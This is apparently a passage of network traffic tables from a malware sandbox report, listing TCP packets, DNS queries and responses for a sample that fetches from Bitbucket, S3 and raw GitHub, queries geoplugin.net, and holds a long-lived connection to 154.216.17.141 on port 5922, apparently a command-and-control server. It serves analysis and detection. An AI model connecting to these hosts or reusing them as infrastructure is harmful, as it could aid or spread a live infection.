                                                                                            Oct 21, 2024 17:05:22.886358976 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.886511087 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.888976097 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.889012098 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.889050007 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.889056921 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.889166117 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.889170885 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.899487972 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.899563074 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.899579048 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.899806976 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.899894953 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.899905920 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.943650007 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.968849897 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.968950033 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.969023943 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.969054937 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.969100952 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.969173908 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.969221115 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.969224930 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.969232082 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.969271898 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.969326973 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.969371080 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.969408989 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.969433069 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.969439983 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.969614983 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.970163107 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.970237970 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.970251083 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.970341921 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.970391035 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.970669985 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.970678091 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.970767975 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.971271038 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.974550009 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.974646091 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.974695921 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.974714041 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.974910975 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.025706053 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.025738955 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.025819063 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.025834084 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.025888920 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.025888920 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.055535078 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.055562973 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.055716991 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.055741072 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.055871010 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.056078911 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.056101084 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.056324959 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.056330919 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.056430101 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.058063984 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.058089018 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.058171988 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.058171988 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.058195114 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.058401108 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.060137987 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.060168982 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.060206890 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.060226917 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.060269117 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.060288906 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.060909033 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.060930967 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.060990095 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.061001062 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.061053038 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.061053038 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.062001944 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.062024117 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.062125921 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.062125921 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.062139034 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.062437057 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.107479095 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.107511997 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.107564926 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.107592106 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.107646942 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.107646942 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.136962891 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.137000084 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.137130976 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.137130976 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.137161016 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.137336969 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.137351990 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.137372017 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.137444019 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.137444019 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.137451887 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.137586117 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.138219118 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.138242006 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.138308048 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.138320923 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.138350010 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.138808966 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.139101982 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.139128923 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.139208078 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.139208078 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.139216900 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.139334917 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.139384985 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.139408112 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.139514923 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.139523983 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.139686108 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:23.140400887 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.140424013 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:23.140505075 CEST49789443192.168.2.6185.199.108.133
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Oct 21, 2024 17:05:23.140505075 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.140521049 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.140755892 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.141130924 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.141149998 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.141247988 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.141266108 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.141314983 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.141937971 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.141958952 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.142085075 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.142093897 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.142137051 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.142137051 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.142177105 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.142201900 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.142251015 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.142258883 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.142293930 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.142293930 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.143088102 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.143110037 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.143304110 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.143326044 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.143708944 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.145087004 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.145108938 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.145194054 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.145210981 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.145240068 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.145302057 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.145525932 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.145545959 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.145592928 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.145602942 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.145616055 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.145642042 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.145646095 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.145683050 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.145683050 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.145690918 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.145751953 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.145751953 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.188863993 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.188904047 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.188976049 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.189008951 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.189028978 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.190124035 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.212048054 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.212078094 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.212196112 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.212212086 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.212272882 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.212276936 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.212291956 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.212313890 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.212368965 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.212368965 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.212377071 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.212533951 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.212553978 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.212615013 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.212615013 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.212620974 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.212703943 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.212723970 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.212744951 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.212824106 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.212824106 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.212836027 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.213047981 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.213071108 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.213093042 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.213177919 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.213177919 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.213181973 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.213267088 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.213370085 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.213388920 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.213473082 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.213473082 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.213478088 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.213510990 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.213534117 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.213592052 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.213592052 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.213597059 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.213680029 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.213697910 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.213715076 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.213720083 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.213790894 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.213790894 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.218724012 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.218744993 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.218789101 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.218835115 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.218843937 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.218843937 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.218858004 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.218980074 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.219000101 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.219038963 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.219063997 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.219063997 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.219073057 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.219086885 CEST  443          49789      185.199.108.133  192.168.2.6
Oct 21, 2024 17:05:23.219137907 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.219137907 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.219772100 CEST  49789        443        192.168.2.6      185.199.108.133
Oct 21, 2024 17:05:23.626089096 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:05:23.632108927 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:05:23.632179022 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:05:23.638025999 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:05:23.643457890 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:05:24.267529964 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:05:24.318536997 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:05:24.372847080 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:05:24.415294886 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:05:24.464296103 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:05:24.469880104 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:05:24.469996929 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:05:24.476387024 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:05:24.493490934 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:05:24.498827934 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:05:24.694657087 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:05:24.743441105 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:05:24.800620079 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:05:24.849761009 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:05:24.858247042 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:05:24.866900921 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:05:24.958507061 CEST  49812        80         192.168.2.6      178.237.33.50
Oct 21, 2024 17:05:24.964570045 CEST  80           49812      178.237.33.50    192.168.2.6
Oct 21, 2024 17:05:24.964653015 CEST  49812        80         192.168.2.6      178.237.33.50
Oct 21, 2024 17:05:24.965724945 CEST  49812        80         192.168.2.6      178.237.33.50
Oct 21, 2024 17:05:24.971697092 CEST  80           49812      178.237.33.50    192.168.2.6
Oct 21, 2024 17:05:25.552651882 CEST  80           49812      178.237.33.50    192.168.2.6
Oct 21, 2024 17:05:25.552751064 CEST  49812        80         192.168.2.6      178.237.33.50
Oct 21, 2024 17:05:25.563987970 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:05:25.569442034 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:05:26.633928061 CEST  80           49812      178.237.33.50    192.168.2.6
Oct 21, 2024 17:05:26.633991003 CEST  49812        80         192.168.2.6      178.237.33.50
Oct 21, 2024 17:05:41.587690115 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:05:41.735948086 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:05:41.741410971 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:06:11.594551086 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:06:11.595941067 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:06:11.601382971 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:06:41.610932112 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:06:41.612391949 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:06:41.617960930 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:07:11.608716011 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:07:11.610266924 CEST  49805        5922       192.168.2.6      154.216.17.141
Oct 21, 2024 17:07:11.615617990 CEST  5922         49805      154.216.17.141   192.168.2.6
Oct 21, 2024 17:07:14.915230036 CEST  49812        80         192.168.2.6      178.237.33.50
Oct 21, 2024 17:07:15.225039959 CEST  49812        80         192.168.2.6      178.237.33.50
Oct 21, 2024 17:07:15.834378958 CEST  49812        80         192.168.2.6      178.237.33.50
Oct 21, 2024 17:07:17.037523985 CEST  49812        80         192.168.2.6      178.237.33.50
Oct 21, 2024 17:07:19.447257042 CEST  49812        80         192.168.2.6      178.237.33.50
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Oct 21, 2024 17:05:15.478352070 CEST  52859        53         192.168.2.6      1.1.1.1
Oct 21, 2024 17:05:15.486227036 CEST  53           52859      1.1.1.1          192.168.2.6
Oct 21, 2024 17:05:16.522131920 CEST  51006        53         192.168.2.6      1.1.1.1
Oct 21, 2024 17:05:16.541230917 CEST  53           51006      1.1.1.1          192.168.2.6
Oct 21, 2024 17:05:21.821723938 CEST  60436        53         192.168.2.6      1.1.1.1
Oct 21, 2024 17:05:21.828881979 CEST  53           60436      1.1.1.1          192.168.2.6
Oct 21, 2024 17:05:24.937035084 CEST  52852        53         192.168.2.6      1.1.1.1
Oct 21, 2024 17:05:24.945240021 CEST  53           52852      1.1.1.1          192.168.2.6
Oct 21, 2024 17:05:34.828758955 CEST  53           54370      1.1.1.1          192.168.2.6
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                            Type            Class        DNS over HTTPS
Oct 21, 2024 17:05:15.478352070 CEST  192.168.2.6  1.1.1.1  0xc0b8    Standard query (0)  bitbucket.org                   A (IP address)  IN (0x0001)  false
Oct 21, 2024 17:05:16.522131920 CEST  192.168.2.6  1.1.1.1  0xe91f    Standard query (0)  bbuseruploads.s3.amazonaws.com  A (IP address)  IN (0x0001)  false
Oct 21, 2024 17:05:21.821723938 CEST  192.168.2.6  1.1.1.1  0x4bd2    Standard query (0)  raw.githubusercontent.com       A (IP address)  IN (0x0001)  false
Oct 21, 2024 17:05:24.937035084 CEST  192.168.2.6  1.1.1.1  0xd8c1    Standard query (0)  geoplugin.net                   A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                              CName                         Address          Type                    Class        DNS over HTTPS
Oct 21, 2024 17:05:15.486227036 CEST  1.1.1.1    192.168.2.6  0xc0b8    No error (0)  bitbucket.org                     -                             185.166.143.48   A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:15.486227036 CEST  1.1.1.1    192.168.2.6  0xc0b8    No error (0)  bitbucket.org                     -                             185.166.143.49   A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:15.486227036 CEST  1.1.1.1    192.168.2.6  0xc0b8    No error (0)  bitbucket.org                     -                             185.166.143.50   A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:16.541230917 CEST  1.1.1.1    192.168.2.6  0xe91f    No error (0)  bbuseruploads.s3.amazonaws.com    s3-1-w.amazonaws.com          -                CNAME (Canonical name)  IN (0x0001)  false
Oct 21, 2024 17:05:16.541230917 CEST  1.1.1.1    192.168.2.6  0xe91f    No error (0)  s3-1-w.amazonaws.com              s3-w.us-east-1.amazonaws.com  -                CNAME (Canonical name)  IN (0x0001)  false
Oct 21, 2024 17:05:16.541230917 CEST  1.1.1.1    192.168.2.6  0xe91f    No error (0)  s3-w.us-east-1.amazonaws.com      -                             52.217.161.161   A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:16.541230917 CEST  1.1.1.1    192.168.2.6  0xe91f    No error (0)  s3-w.us-east-1.amazonaws.com      -                             52.217.36.188    A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:16.541230917 CEST  1.1.1.1    192.168.2.6  0xe91f    No error (0)  s3-w.us-east-1.amazonaws.com      -                             54.231.164.161   A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:16.541230917 CEST  1.1.1.1    192.168.2.6  0xe91f    No error (0)  s3-w.us-east-1.amazonaws.com      -                             16.15.184.63     A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:16.541230917 CEST  1.1.1.1    192.168.2.6  0xe91f    No error (0)  s3-w.us-east-1.amazonaws.com      -                             3.5.23.236       A (IP address)          IN (0x0001)  false
